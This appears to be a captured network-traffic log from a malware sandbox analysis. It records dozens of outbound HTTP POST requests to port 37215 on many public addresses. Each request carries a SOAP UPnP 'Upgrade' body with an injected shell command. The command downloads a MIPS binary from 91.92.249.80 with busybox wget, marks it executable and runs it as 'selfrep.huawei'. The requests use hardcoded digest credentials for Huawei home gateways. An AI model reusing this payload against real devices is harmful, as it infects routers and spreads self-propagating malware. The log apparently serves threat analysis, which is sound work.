                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2305192.168.2.233491841.107.63.9037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.667808056 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2306192.168.2.2333484158.204.35.4237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.667825937 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2307192.168.2.235365898.10.173.16337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.667843103 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2308192.168.2.2346742197.195.190.16937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.667880058 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2309192.168.2.233657832.6.58.1337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.668060064 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2310192.168.2.2350592197.116.54.16537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.668061018 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2311192.168.2.2353352157.33.21.21237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.668070078 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2312192.168.2.235407041.56.134.11937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.668085098 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2313192.168.2.233719241.168.234.5137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.668229103 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2314192.168.2.2348822213.4.9.16537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.668229103 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2315192.168.2.2351412197.137.91.13037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.668252945 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
